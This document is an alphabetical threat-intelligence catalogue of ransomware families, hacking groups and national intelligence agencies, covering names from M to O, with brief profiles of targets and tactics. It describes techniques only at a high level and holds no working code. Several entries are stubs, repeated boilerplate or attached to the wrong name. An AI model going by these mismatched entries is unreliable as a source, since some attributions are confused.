Ransomware
Mountlocket
ransomware
MoWare H.F.D
ransomware
Mr.Dec
Mr. Dec ransomware is cryptovirus that was first spotted in mid-May 2018, and since then was updated multiple times. The ransomware encrypts all personal data on the device with the help of AES encryption algorithm and appends .[ID]random 16 characters[ID] file extension, preventing from their further usage.
Mr.Locker
ransomware
Mr_Rot13
Mr_Rot13 is a stable hacking group identified through a PHP backdoor and a Downloader domain linked to a C2 infrastructure active since 2020. They utilize the Rot13 algorithm for obfuscation and have demonstrated a low detection rate across security products, indicating advanced operational security. Their activities include exploiting CVE-2026-41940 to deliver malicious payloads and maintaining covert communication via Telegram. The group has shown a particular focus on WordPress as a target, with ongoing operations that suggest a sophisticated threat actor rather than opportunistic attackers.
Mr403Forbidden
ransomware
ms13 089
ms13 089 is an active extortion or ransomware group tracked by RansomLook.
MSN CryptoLocker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.2 bitcoins.
MuchLove
ransomware
Muhstik
ransomware
Muliaka
Muliaka is an active extortion or ransomware group tracked by RansomLook.
MUMMY SPIDER
MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. First observed in mid-2014, this malware shared code with the Bugat (aka Feodo) banking Trojan. However, MUMMY SPIDER swiftly developed the malware’s capabilities to include an RSA key exchange for command and control (C2) communication and a modular architecture. MUMMY SPIDER does not follow typical criminal behavioral patterns. In particular, MUMMY SPIDER usually conducts attacks for a few months before ceasing operations for a period of between three and 12 months, before returning with a new variant or version. After a 10 month hiatus, MUMMY SPIDER returned Emotet to operation in December 2016 but the latest variant is not deploying a banking Trojan module with web injects, it is currently acting as a ‘loader’ delivering other malware packages. The primary modules perform reconnaissance on victim machines, drop freeware tools for credential collection from web browsers and mail clients and a spam plugin for self-propagation. The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot. MUMMY SPIDER advertised Emotet on underground forums until 2015, at which time it became private. Therefore, it is highly likely that Emotet is operate
MurenShark
MurenShark is an advanced persistent threat group that operates primarily in the Middle East, with a focus on targeting Turkey. They have shown interest in military projects, as well as research institutes and universities. This group is highly skilled in counter-analysis and reverse traceability, using sophisticated tactics to avoid detection. They utilize compromised websites as file servers and command and control servers, and have been known to use attack tools like NiceRender for phishing purposes.
MVP Ransomware
Siri discovered a new ransomware that is appending the .mvp extension to encrypted files.
MXX
ransomware
Mydata
Mydata is an active extortion or ransomware group tracked by RansomLook.
Mydecryptor
Mydecryptor is an active extortion or ransomware group tracked by RansomLook.
Mystic
ransomware
Mythic Likho
Arcane Werewolf has been observed targeting Russian manufacturing enterprises through phishing emails that lead to malicious links and spoofed websites. The actor has utilized ZIP archives containing malicious LNK files and a C++ dropper in their campaigns. Their infrastructure includes a C2 server disguised as a Russian manufacturing company website. Kaspersky researchers have noted their evolving TTPs, indicating either a new group or one that has significantly improved its methods.
MZP
ransomware
N-Splitter
Ransomware Russian Koolova Variant
n1n1n1
Ransomware Filemaker: "333333333333"
N2019cov
ransomware
n3tworm
n3tworm is an active extortion or ransomware group tracked by RansomLook.
N4ughtysecTU
In March 2022, a hacking group calling themselves N4ughtySecTU claimed to have breached TransUnion’s systems and threatened to leak four terabytes of data if the credit bureau didn’t pay a $15-million (R242-million) ransom.
Naampa
ransomware
Naga
Naga is an active extortion or ransomware group tracked by RansomLook.
Nagini Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Looks for C:\Temp\voldemort.horcrux
Nam3L3ss
Nam3L3ss is a threat actor who has leaked data from 25 companies, including over 2.8 million lines of Amazon employee data, which was confirmed to be stolen from a third-party service provider. The actor is distributing this data on BreachForums and claims to have numerous unreleased datasets.
Namaste
ransomware
Namibia Central Intelligence Service
Namibia Central Intelligence Service (NCIS)
NanoLocker
Ransomware no extension change, has a GUI
NARWHAL SPIDER
NARWHAL SPIDER’s operation of Cutwail v2 was limited to country-specific spam campaigns, although late in 2019 there appeared to be an effort to expand by bringing in INDRIK SPIDER as a customer.
NAS Data Compromiser
ransomware
Nasir Security
Nasir Security is an active extortion or ransomware group tracked by RansomLook.
Nasjonal sikkerhetsmyndighet
Nasjonal sikkerhetsmyndighet (NSM) (National Security Authority)
National Accountability Bureau
National Accountability Bureau (NAB)
National Anti-Narcotics Agency (Indonesia)
National Narcotics Agency Intelligence Section – Seksi Intelijen Badan Narkotika Nasional
National Assessments Bureau
National Assessments Bureau[20]
National Ballistics Intelligence Service
National Ballistics Intelligence Service (NBIS)[35] – Illegal firearms intelligence analysis.
National Board of Revenue
Central Intelligence Unit (CIU)
National Bureau of Investigation (Philippines)
National Bureau of Investigation (NBI) – Pambansang Kawanihan ng Pagsisiyasat
National Centre for Counter Terrorism
National Centre for Counter Terrorism (CNRLT, Coordination nationale du renseignement et de la lutte contre le terrorisme)
National Committee for Intelligence Coordination
National Committee for Intelligence Coordination
National Coordinator for Counterterrorism and Security
National Coordinator for Counterterrorism and Security - Nationaal Coördinator Terrorismebestrijding en Veiligheid (NCTV)
National Counter Terrorism Authority
National Counter Terrorism Authority (NACTA)
National Crime Agency
National Crime Agency (NCA)[40] – Organised crime intelligence gathering and analysis. Agency utilizes Unexplained wealth orders and the Investigatory Powers Act 2016.[41][42] NCA officers are posted overseas in around 50 countries.[43] They operate the UK Protected Persons Service, which includes witness protection.[44]
National Crime Intelligence Agency (NCIA)
National Crime Intelligence Agency (NCIA)
National Crises Management Cell
National Crises Management Cell (NCMC)
National Cryptologic Center
National Cryptologic Center - (Centro Criptológico Nacional) (CCN)
National Cyber and Crypto Agency
National Cyber and Crypto Agency (BSSN) – Badan Siber dan Sandi Negara
National Defence Radio Establishment
National Defence Radio Establishment – Försvarets Radioanstalt (FRA)
National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)
National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)
National Directorate of Intelligence (Peru)
National Directorate of Intelligence - Dirección Nacional de Inteligencia (DINI)
National Domestic Extremism and Disorder Intelligence Unit
National Domestic Extremism and Disorder Intelligence Unit (NDEDIU)[34] – Domestic counter extremism and public disorder intelligence gathering and analysis.
National Economic Crime Bureau
Financial Intelligence Unit (FIU)
National Fraud Intelligence Bureau
National Fraud Intelligence Bureau (NFIB)[36] – Economic crime intelligence gathering and analysis.
National Geospatial-Intelligence Agency
National Geospatial-Intelligence Agency (NGA)
National Intelligence Agency (Democratic Republic of the Congo)
National Intelligence Agency (ANR)
National Intelligence Agency (Nigeria)
National Intelligence Agency (Foreign Intelligence and Counterintelligence)
National Intelligence Agency (Thailand)
National Intelligence Agency (NIA)
National Intelligence and Security Agency (NISA)[6][7][8][9]
National Intelligence and Security Agency (NISA)[6][7][8][9]
National Intelligence and Security Agency
National Intelligence and Security Agency (NISA)
National Intelligence and Security Service (Ethiopia)
National Intelligence and Security Service (NISS)
National Intelligence and Security Service (Panama) (page does not exist)
National Intelligence and Security Service - Servicio Nacional de Inteligencia y Seguridad (SENIS)[24]
National Intelligence and Security Service (Rwanda)
National Intelligence and Security Service (Rwanda)
National Intelligence Centre (México)
National Intelligence Centre (CNI)
National Intelligence Cooperating Center (NICC)
National Intelligence Cooperating Center (NICC)
National Intelligence Coordinating Agency
National Intelligence Coordinating Agency (NICA) – Pambansang Ahensiya sa Ugnayang Intelihensiya
National Intelligence Directorate (Colombia)
Dirección Nacional de Inteligencia (DNI)
National Intelligence Directorate (Pakistan)
National Intelligence Directorate (NID)
National Intelligence Organization (Papua New Guinea)
National Intelligence Organization (NIO)
National Intelligence Organization (Turkey)
National Intelligence Organization (MİT)
National Intelligence Service (Albania)
State Intelligence Service (SHISH) – Sherbimi Informativ Shteteror
National Intelligence Service (Bulgaria)
State Intelligence Agency (Държавна агенция „Разузнаване“ (DAR)) – overseas intelligence gathering service under the supervision of the Council of Ministers of Bulgaria
National Intelligence Service (Burundi)
Service national de renseignement (SNR)
National Intelligence Service (Greece)
National Intelligence Service (ΕΥΠ) – Εθνική Υπηρεσία Πληροφοριών
National Intelligence Service (Kenya)
National Intelligence Service(NIS)
National Intelligence Service (South Korea)
National Intelligence Service (NIS)
National Investigation Agency
National Investigation Agency[10]
National Investigation Department of Nepal
National Investigation Department (NID)
National Police Agency of the ROC (Taiwan)
National Police Agency (NPA)
National Police Intelligence Directorate
National Police Intelligence Directorate (DNIP) – Dirección Nacional de Inteligencia Policial
National Reconnaissance Office
National Reconnaissance Office (NRO)
National Security Affairs Cell
National Security Affairs Cell[3]
National Security Agency (Bahrain)
NSA – National Security Agency
National Security Agency (Liberia)
National Security Agency
National Security Agency (Montenegro)
National Security Agency (ANB)
National Security Agency
National Security Agency (NSA)
National Security Bureau (Republic of China)
National Security Bureau (NSB)
National Security Bureau (Slovakia)
National Security Bureau - Národný bezpečnostný úrad (NBÚ)
National Security Bureau (Yemen)
National Security Bureau (NSB)
National Security Intelligence
National Security Intelligence (NSI)
National Security Office (Eritrea)
National Security Office
National Security Service (Armenia)
National Security Service (NSS)
National Technical Research Organisation
National Technical Research Organisation (NTRO)[10]
National Telecommunication Monitoring Centre
National Telecommunication Monitoring Centre (NTMC)
Natohub
Natohub is a hacker who claimed to have stolen 42,000 documents from the UN’s International Civil Aviation Organization and is offering the data for sale on underground forums. The compromised documents allegedly contain personal records of ICAO staff and others associated with the agency. While ICAO is investigating the potential breach, Natohub has also made unverified claims about accessing personal data on thousands of UN delegates. The actor's track record of leaks is limited, raising questions about the credibility of their assertions.
Naval Intelligence Department (NID)
Naval Intelligence Department (NID)
Naval Intelligence (Pakistan)
Naval Intelligence (NI)
Navy Intelligence Department (page does not exist)
navy Intelligence Department (military intelligence)
Nazar
This actor was identified by Juan Andres Guerrero-Saade from the SIG37 cluster as published in the ShadowBrokers' 'Lost in Translation' leak. Earliest known sighting potentially dates back to as far as 2008 with a confirmed center of activity around 2010-2013. The actor name is derived from a PDB debug string fragment: 'khzer'. Victimology indicates targeting of Iran, assessed with low confidence based on VT file submission locations. Nazar employs a modular toolkit where a main dropper silently registers multiple DLLs as OLE controls in the Windows registry. Functionality includes keylogging, sound and screen grabbing, as well as traffic capture using the MicroOlap Packet Sniffer library.
NazCrypt
ransomware
NB65
Network Battalion 65 is an hactivist group with ties to Anonymous, known for attacking Russian companies and performing hack-and-leak operations.
Nblock
Nblock is an active extortion or ransomware group tracked by RansomLook.
NCrypt Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Nefilim
According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected RSA2048.
Negozl
ransomware
Neitrino
ransomware
NemeS1S Ransomware
Ransomware as a Service
Nemesis Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 10 bitcoins.
Nemty
A new ransomware family dubbed “Nemty” for the extension it adds to encrypted files has recently surfaced in the wild. According to a report from Bleeping Computer, New York-based reverse engineer Vitali Kremez posits that Nemty is possibly delivered through exposed remote desktop connections.
Nemucod
Ransomware 7zip (a0.exe) variant cannot be decrypted Encrypts the first 2048 Bytes
Nemzetbiztonsági Hivatal
Alkotmányvédelmi Hivatal (AH) (Constitution Protection Office)
Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)
Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)
Nemzeti Információs Központ (NIK) (National Information Center)
Nemzeti Információs Központ (NIK) (National Information Center)
Netflix Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware uses the known online library as a decoy. It poses as Netflix Code generator for Netflix login, but instead encrypts your files. The ransom is 100$ in Bitcoins.
Netix
Ransomware
Netrunner
Netrunner is an active extortion or ransomware group tracked by RansomLook.
NetRunnerPR
NetRunnerPR has claimed to breach the networks of Shiraume Hospital and Nippon Medical School Musashi Kosugi Hospital in Japan, exfiltrating patient PII and medical records. The actor announced plans to release a complete database on March 5, 2026, and an additional 20,000 records on February 16, 2026, contingent on undisclosed conditions. The claims were made on a cybercrime forum, accompanied by sample data to validate the breaches. NetRunnerPR's account shows limited activity history and lacks a documented history of major ransomware operations or confirmed breaches, raising questions about the credibility of the claims.
Netwalker
Netwalker is an active extortion or ransomware group tracked by RansomLook.
Nevada
Nevada is an active extortion or ransomware group tracked by RansomLook.
New Zealand Security Intelligence Service
New Zealand Security Intelligence Service[20]
News Division
News Division
NewsPenguin
NewsPenguin is threat actor that has been targeting organizations in Pakistan. They use a complex payload delivery mechanism and exploit the upcoming Pakistan International Maritime Expo & Conference as a lure to trick their victims. The group has been linked to a phishing campaign that leverages spear-phishing emails and weaponized documents to deliver an advanced espionage tool.
NewWave
ransomware
NextCry
ransomware
Nexus Zeta
Nexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already been observed in implementing two other known SOAP related exploits, CVE-2014–8361 and CVE-2017–17215 in his Satori botnet project. A third SOAP exploit, TR-069 bug has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP related exploit which is discovered in the wild by IoT botnets.
Nhtnwcuf Ransomware (Fake)
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Nhtnwcuf
Ransomware Does not encrypt the files / Files are destroyed
Nickel Alley
NICKEL ALLEY is a North Korean threat group that targets technology professionals through fake job opportunities, employing social engineering tactics such as creating fraudulent LinkedIn pages and GitHub repositories for malware delivery. They utilize the ClickFix tactic to deploy the PyLangGhost RAT, which supports file exfiltration and system profiling, particularly focusing on Chrome cryptocurrency wallet data. The group has also leveraged Visual Studio Code tasks to execute commands for malware retrieval based on the victim's operating system. Their operations indicate a dual focus on cryptocurrency theft and potential supply chain compromise or corporate espionage.
Night Dragon
Night Dragon is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Night Tsunami
Microsoft threat actor profile. Origin/Threat: Israel.
NightEagle
NightEagle is an advanced Threat Actor that targeted China's High-Tech Industry and Military Organisation, leveraging sophisticated techniques, 0 days, and specialized detection avoiding malware. The threat actor seems to have access to significant funding, with dedicated infrastructure, and focuses on low-noise, low-impact intelligence gathering operations. NightEagle is identified as a North-American, state-sponsored or affiliated group that has been active since at least 2023.
Nightmare
ransomware
Nightsky
Nightsky is an active extortion or ransomware group tracked by RansomLook.
Nightspire
Nightspire is an active extortion or ransomware group tracked by RansomLook.
NinjaLoc
ransomware
Nitro
These attackers were the subject of an extensive report by Symantec in 2011, which termed the attackers Nitro and stated: 'The goal of the attackers appears to be to collect intellectual property such as design documents, formulas, and manufacturing processes. In addition, the same attackers appear to have a lengthy operation history including attacks on other industries and organizations. Attacks on the chemical industry are merely their latest attack wave. As part of our investigations, we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks.' Palo Alto Networks reported on continued activity by the attackers in 2014.
Nitrogen
Nitrogen is an active extortion or ransomware group tracked by RansomLook.
NM4
ransomware
NMCRYPT Ransomware
The NMCRYPT Ransomware is a generic file encryption Trojan that was detected in the middle of April 2018. The NMCRYPT Ransomware is a file encoder Trojan that is designed to make data unreadable and convince users to pay a fee for unlocking content on the infected computers. The NMCRYPT Ransomware is nearly identical to hundreds of variants of the HiddenTear open-source ransomware and compromised users are unable to use the Shadow Volume snapshots made by Windows to recover. Unfortunately, the NMCRYPT Ransomware disables the native recovery features on Windows, and you need third-party applications to rebuild your data.
NMoreia 2.0 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
NMoreira Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
NMoreira
Ransomware
Noblis
ransomware
NOCTURNAL SPIDER
Mentioned as MaaS operator in CrowdStrike's 2020 Report.
Nodera Ransomware
Nodera is a ransomware family that uses the Node.js framework and was discovered by Quick Heal researchers. The infection chain starts with a VBS script embedded with multiple JavaScript files. Upon execution, a directory is created and both the main node.exe program and several required NodeJS files are downloaded into the directory. Additionally, a malicious JavaScript payload that performs the encryption process is saved in this directory. After checking that it has admin privileges and setting applicable variables, the malicious JavaScript file enumerates the drives to create a list of targets. Processes associated with common user file types are stopped and volume shadow copies are deleted. Finally, all user-specific files on the C: drive and all files on other drives are encrypted and are appended with a .encrypted extension. The ransom note containing instructions on paying the Bitcoin ransom are provided along with a batch script to be used for decryption after obtaining the private key. Some mistakes in the ransom note identified by the researchers include the fact that it mentions a 2048-bit RSA public key instead of 4096-bit (the size that was actually used), a hard-coded private key destruction time dating back almost 2 years ago, and a lack of instructions for how the private key will be obtained after the ransom is paid. These are signs that the ransomware may be in the development phase and was likely written by an amateur. For more information, see the QuickHeal blog post in the Reference section below.
Noescape
Noescape is an active ransomware-as-a-service operation tracked by RansomLook.
Nog4yH4n
ransomware
Nokoyawa
Nokoyawa is an active extortion or ransomware group tracked by RansomLook.
NOMAD PANDA
In the first quarter of 2018, CrowdStrike Intelligence identified NOMAD PANDA activity targeting Central Asian nations with exploit documents built with the 8.t tool.
Nomikon
ransomware
NoName057(16)
NoName057(16) is performing DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more in Ukraine and neighboring countries supporting Ukraine, like Ukraine itself, Estonia, Lithuania, Norway, and Poland.
NoobCrypt
Ransomware
NotAHero
ransomware
NOTROBIN
Researchers at FireEye report finding a hacking group (dubbed NOTROBIN) that has been bundling mitigation code for NetScaler servers with its exploits. In effect, the hackers exploit the flaw to get access to the server, kill any existing malware, set up their own backdoor, then block off the vulnerable code from future exploit attempts by mitigation.
Nova RaaS
Nova appears to refer to a ransomware-as-a-service ("RaaS") infrastructure provider. Public threat reporting indicates that affiliates leveraging the Nova victim extortion site are known to use a Rust-based ransomware developed by the RALord ransomware operation, although an original ".nova" ransomware family has been identified as well.[[SonicWall Nova Ransomware April 11 2025](/references/4926be5f-0eea-44cc-a73e-2f173eee901b)][[Cyble April 17 2025](/references/cad46e02-2e68-4347-be1c-7be910adee95)]
nova
Rebrand of RALord
Nozelesn
ransomware
Nuke
Ransomware
Nullbulge
NullBulge is a cybercriminal threat group targeting AI and gaming focused entities. They weaponize code in publicly available repositories to distribute malware, including LockBit ransomware. The group claims to be motivated by a pro-art, anti-AI cause, but their activities indicate a financial focus. NullBulge uses obfuscated code in public repositories and malicious mods to target their victims.
Nullbyte
Ransomware
Nulltica
ransomware
nvrmre
AKA Lemon
Nx / OSR
ransomware
Nyton
ransomware
NyxarGroup
NyxarGroup is a threat actor involved in a coordinated data brokerage ecosystem across Latin America, primarily targeting government infrastructure. They have published high volumes of data, including 110,000 records from Chile's Servicio Civil platform and 250GB from the Ley del Lobby platform, which tracks lobbying activities. The data exfiltrated includes limited fields but provides a directory of Chilean government employees, enhancing the visibility of the public sector workforce. NyxarGroup's activities indicate a focus on exploiting government transparency and training systems for data leaks.
NZMR
ransomware
Obscura
Obscura is an active extortion or ransomware group tracked by RansomLook.
Obsidian Orb
Obsidian Orb is an active extortion or ransomware group tracked by RansomLook.
Oceans
Oceans is an active extortion or ransomware group tracked by RansomLook.
Ocelot Ransomware (FAKE RANSOMWARE)
It’s directed to English speaking users, therefore is able to infect worldwide. This is a fake ransomware. Your files are not really encrypted, however the attacker does ask for a ransom of .03 bitcoins. It is still dangerous even though it is fake, he still go through to your computer.
OCT
ransomware
Octovillan
Octovillan is an active extortion or ransomware group tracked by RansomLook.
ODCODC
Ransomware
of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)
This ransomware is originated in English, therefore could be used worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.
Office for Foreign Relations and Information
Office for Foreign Relations and Information (Úřad pro zahraniční styky a informace, ÚZSI)
Office for Safeguarding National Security of the CPG in the HKSAR
Office for Safeguarding National Security of the CPG in the HKSAR (CPGNSO)
Office for Security and Counter-Terrorism
Office for Security and Counter-Terrorism (OSCT) – Counter terrorism and protecting critical national infrastructure.
Office of Intelligence and Counterintelligence
Office of Intelligence and Counterintelligence (OICI)
Office of National Intelligence (Australia)
Office of National Intelligence (ONI)
Office of Naval Intelligence
Office of Naval Intelligence (ONI)
Office of Terrorism and Financial Intelligence
Office of Terrorism and Financial Intelligence (TFI)
Office of the Chief of Military Security Affairs
Office of the Chief of Military Security Affairs (OCMSA)
Offline ransomware
Ransomware email addresses overlap with .777 addresses
Offwhite
Offwhite is an active extortion or ransomware group tracked by RansomLook.
Oghab 2
Oghab 2 – Nuclear facilities security
Ogre
ransomware
OhNo-FakePDF
ransomware
OhNo!
ransomware
OilAlpha
OilAlpha has almost exclusively relied on infrastructure associated with the Public Telecommunication Corporation (PTC), a Yemeni government-owned enterprise reported to be under the direct control of the Houthi authorities. OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets. It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices.
OilRig
OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets. OilRig is an active and organized threat group, which is evident based on their systematic targeting of specific organizations that appear to be carefully chosen for strategic purposes. Attacks attributed to this group primarily rely on social engineering to exploit the human rather than software vulnerabilities; however, on occasion this group has used recently patched vulnerabilities in the delivery phase of their attacks. The lack of software vulnerability exploitation does not necessarily suggest a lack of sophistication, as OilRig has shown maturity in other aspects of their operations. Such maturities involve: -Organized evasion testing used the during development of their tools. -Use of custom DNS Tunneling protocols for command and control (C2) and data exfiltration. -Custom web-shells and backdoors used to persistently access servers. OilRig relies on stolen account credentials for lateral movement. After OilRig gains access to a system, they use credential dumping tools, such as Mimikatz, to steal credentials to accounts logged into the compromised system. The group uses these credentials to access and to move laterally to other systems on the network. After obtaining credentials from a system, operators in this group prefer to use tools other than their backdoors to access the compromised systems, such as remote desktop and putty. OilRig also uses phishing sites to harvest credentials to individuals at targeted organizations to gain access to internet accessible resources, such as Outlook Web Access. Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government.
OldGremlin
OldGremlin is a Russian-speaking ransomware group that has been active for several years. They primarily target organizations in Russia, including banks, logistics, industrial, insurance, retail, and IT companies. OldGremlin is known for using phishing emails as an initial infection vector and has developed custom malware for both Windows and Linux systems. They have conducted multiple malicious email campaigns and demand large ransoms from their victims, with some reaching millions of dollars.
Oled
ransomware
OMG! Ransomware
Ransomware. Infection: drive-by-download; Platform: Windows; Extorsion by Prepaid Voucher
OmniSphere
ransomware
One
ransomware
Onepercent
Onepercent is an active extortion or ransomware group tracked by RansomLook.
ONI
ransomware
OnionDog
This threat actor targets the South Korean government, transportation, and energy sectors.
ONYX Ransomeware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Georgian ransomware
OoPS Ramenware
ransomware
OopsLocker
ransomware
Opal Sleet
Konni is a threat actor associated with APT37, a North Korean cyber crime group. They have been active since 2012 and are known for their cyber-espionage activities. Konni has targeted various sectors, including education, government, business organizations, and the cryptocurrency industry. They have exploited vulnerabilities such as CVE-2023-38831 and have used malware like KonniRAT to gain control of victim hosts and steal important information.
OPdailyallowance
ransomware
OpenToYou
ransomware
Operation BugDrop
This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations.
Operation C-Major
Group targeting Indian Army or related assets in India, as well as activists and civil society in Pakistan. Attribution to a Pakistani connection has been made by TrendMicro and others.
Operation Cobalt Whisper
Operation Cobalt Whisper is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Operation Comando
Operation Comando is a pure cybercrime campaign, possibly with Brazilian origin, with a concrete and persistent focus on the hospitality sector, which proves how a threat actor can be successful in pursuing its objectives while maintaining a cheap budget. The use of DDNS services, publicly available remote access tools, and having a minimum knowledge on software development (in this case VB.NET) has been enough for running a campaign lasting month, and potentially gathering credit card information and other possible data.
Operation DRBControl
Operation DRBControl is a cyberespionage campaign targeting gambling companies in Southeast Asia, first identified in 2019. The operation involves the use of HyperBro malware and SysUpdate variants, with evidence of customer database and source code exfiltration. The threat actor has employed domain spoofing for command and control and has shown a consistent interest in the gambling industry. Trend Micro's analysis linked multiple tools and malware families to this campaign, indicating a sophisticated and evolving threat landscape.
Operation Emmental
Operation Emmental, also known as the Retefe gang, is a threat actor group that has been active since at least 2012. They primarily target customers of banks in countries such as Austria, Sweden, Switzerland, and Japan. The group has developed sophisticated malware, including a Mac alternative called Dok, to bypass two-factor authentication and hijack network traffic. They have also been observed using phishing emails to spread their malware. The group is believed to be Russian-speaking and has continuously improved their malicious codes over the years.
Operation ForumTroll
Operation ForumTroll is a sophisticated cyber espionage campaign discovered by Kaspersky in mid-March 2025. The attack exploited a zero-day vulnerability in Google Chrome, identified as CVE-2025-2783, which allowed attackers to bypass the browser's security features. Victims were infected by clicking on personalized phishing links in emails, allegedly from the organizers of the "Primakov Readings" forum, targeting media outlets, educational institutions, and government organizations in Russia. The goal of the attack appears to be espionage, and the campaign is believed to be the work of a state-sponsored APT group. Google quickly released an update to fix the vulnerability after being notified by Kaspersky.
Operation Ghoul
Operation Ghoul is a profit-driven threat actor that targeted over 130 organizations in 30 countries, primarily in the industrial and engineering sectors. They employed high-quality social engineering techniques, such as spear-phishing emails disguised as payment advice from a UAE bank, to distribute malware. The group's main motivation is financial gain through the sale of stolen intellectual property and business intelligence, as well as attacks on banking accounts. Their attacks were effective, particularly against companies that were unprepared to detect them.
Operation Global III
Ransomware Is a file infector (virus)
Operation Kabar Cobra
Operation Kabar Cobra is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Operation Parliament
This threat actor uses spear-phishing techniques to target parliaments, government ministries, academics, and media organizations, primarily in the Middle East, for the purpose of espionage. Based on our findings, we believe the attackers represent a previously unknown geopolitically motivated threat actor. The campaign started in 2017, with the attackers doing just enough to achieve their goals. They most likely have access to additional tools when needed and appear to have access to an elaborate database of contacts in sensitive organizations and personnel worldwide, especially of vulnerable and non-trained staff. The victim systems range from personal desktop or laptop systems to large servers with domain controller roles or similar. The nature of the targeted ministries varied, including those responsible for telecommunications, health, energy, justice, finance and so on. Operation Parliament appears to be another symptom of escalating tensions in the Middle East region. The attackers have taken great care to stay under the radar, imitating another attack group in the region. They have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their command and control servers. The targeting seems to have slowed down since the beginning of 2018, probably winding down when the desired data or access was obtained. The targeting of specific victims is unlike previously seen behavior in regional campaigns by Gaza Cybergang or Desert Falcons and points to an elaborate information-gathering exercise that was carried out before the attacks (physical and/or digital). With deception and false flags increasingly being employed by threat actors, attribution is a hard and complicated task that requires solid evidence, especially in complex regions such as the Middle East.
Operation Poison Needles
What’s noteworthy is that according to the introduction on the compromised website of the polyclinic (http://www.p2f.ru), the institution was established in 1965 and it was founded by the Presidential Administration of Russia. The multidisciplinary outpatient institution mainly serves the civil servants of the highest executive, legislative, judicial authorities of the Russian Federation, as well as famous figures of science and art. Since it is the first detection of this APT attack by 360 Security on a global scale, we code-named it as “Operation Poison Needles”, considering that the target was a medical institution. Currently, the attribution of the attacker is still under investigation. However, the special background of the polyclinic and the sensitiveness of the group it served both indicate the attack is highly targeted. Simultaneously, the attack occurred at a very sensitive timing of the Kerch Strait Incident, so it also aroused the assumption on the political attribution of the attack.
Operation Red Signature
The threat actors compromised the update server of a remote support solutions provider to deliver a remote access tool called 9002 RAT to their targets of interest through the update process. They carried this out by first stealing the company’s certificate then using it to sign the malware. They also configured the update server to only deliver malicious files if the client is located in the range of IP addresses of their target organisations.
Operation Shadow Force
Operation Shadow Force is a group of malware that is representative of Shadow Force and Wgdrop from 2013 to 2020, and is a group activity that attacks Korean companies and organizations. The group's first confirmed attack was in March 2013, but considering the date of malware creation, it is likely to have been active before 2012. Since the malware used mainly by them is Shadow Force, it was named Operation Shadow Force, and it has not been confirmed whether the attacker is associated with a known group.
Operation ShadowHammer
Newly discovered supply chain attack that leveraged ASUS Live Update software. The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.
Operation Sharpshooter
